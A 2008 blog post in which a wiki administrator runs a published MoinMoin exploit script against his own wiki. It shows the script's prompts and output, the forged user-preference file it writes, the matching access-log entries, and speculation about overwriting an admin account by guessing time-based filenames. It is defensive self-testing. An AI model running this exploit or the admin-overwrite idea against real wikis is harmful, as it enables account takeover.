Wednesday, February 20, 2008

MoinMoin Vulns



Courtesy of a Secunia Feed I ran across the vulns in MoinMoin -- which I my wiki of choice for work or play. I don't allow any authenticated users to edit pages or upload files (apart from me) but I was paranoid enough to take my wiki down for a bit until I've had a chance to understand the issues more or until Ubuntu releases a package.

Update
franz-g4:~ mdfranz$ python hackmoin.py
MoinMoin host: i.e: http://127.0.0.1:8000/
MoinMoin host ( include http and /): http://www.threatmind.net/secwiki/
Ok, the file: README was created, and you can logging setting the cookie MOIN_ID='README' in your browser.


Yeah the exploit does indeed create (overwrite?) a README file in your data/user directory that looks like this:

aliasname=ilikecolombianpeople
css_url=
date_fmt=
datetime_fmt=
disabled=0
edit_on_doubleclick=0
edit_rows=20
editor_default=text
editor_ui=freechoice
email=just@nonrootuser.co
enc_password={SHA}hzAn1bupZwrTEQuFWlZA3TsEcVc=
language=
last_saved=1203553839.72
mailto_author=0
name=nonroot
quicklinks=podriamos-insertar-codigo-php-aqui-verdad-que-si
remember_last_visit=0
remember_me=1
show_fancy_diff=1
show_nonexist_qm=0
show_page_trail=1
show_toolbar=1
show_topbottom=0
subscribed_pages=
theme_name=modern
tz_offset=0
want_trivial=0
wikiname_add_spaces=0

So the question is, so what? Can this be used to erase/reset the password of the Admin user? Not sure. But I did discover a shitload of user preference files in my wiki, yikes! I'm sure they are harmless... I guess the key issue is whether this exploit would allow you to overwrite an existing admin users (through the web UI you can't create a new user for one that already exists, IIRC).

It would definitely appear that if you can guess the time based filename etime.time.anothertime you could.

And here is what the exploit looks like in your logs:

stinkmonkey.cable.rcn.com - - [21/Feb/2008:00:29:47 +0000] "POST /secwikiUserPreferences/ HTTP/1.1" 404 229 "-" "Python-urllib/2.4" "-"
stinkmonkey.cable.rcn.com - - [21/Feb/2008:00:30:10 +0000] "POST /secwikiUserPreferences/ HTTP/1.1" 404 229 "-" "Python-urllib/2.4" "-"
stinkmonkey.cable.rcn.com - - [21/Feb/2008:00:30:39 +0000] "POST /secwiki/UserPreferences/ HTTP/1.1" 200 23341 "-" "Python-urllib/2.4" "-

And yeah it took me 3 times because I kept forgetting the slash (as you can see) and because I'm a "jackass" (to use tqbf's favorite expletive
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)